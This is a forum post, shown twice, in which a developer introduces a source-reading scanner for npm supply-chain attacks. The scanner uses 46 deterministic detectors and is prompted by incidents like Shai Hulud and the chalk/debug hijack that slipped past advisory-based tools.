Shai Hulud, the chalk and debug hijack, and S1ngularity all spread before any advisory existed. Tools that rely on vulnerability databases like npm audit, Dependabot, or Snyk passed them clean because there was nothing in the database yet.
That annoyed me enough that I built a different approach.
Instead of checking advisories, the scanner reads the package source and looks for behaviors common in supply chain attacks. Things like install script abuse, credential theft, unexpected filesystem access, network exfiltration, and obfuscated payloads.
Right now it uses 46 deterministic detectors. No LLMs. same result every time.
Full methodology and dataset notes are here:
westbayberry.com/benchmark
Curious what attack patterns people here people here have dealt with before and how they handled them.
ComCat•1h ago
Shai Hulud, the chalk and debug hijack, and S1ngularity all spread before any advisory existed. Tools that rely on vulnerability databases like npm audit, Dependabot, or Snyk passed them clean because there was nothing in the database yet.
That annoyed me enough that I built a different approach.
Instead of checking advisories, the scanner reads the package source and looks for behaviors common in supply chain attacks. Things like install script abuse, credential theft, unexpected filesystem access, network exfiltration, and obfuscated payloads.
Right now it uses 46 deterministic detectors. No LLMs. same result every time.
Full methodology and dataset notes are here: westbayberry.com/benchmark
Curious what attack patterns people here people here have dealt with before and how they handled them.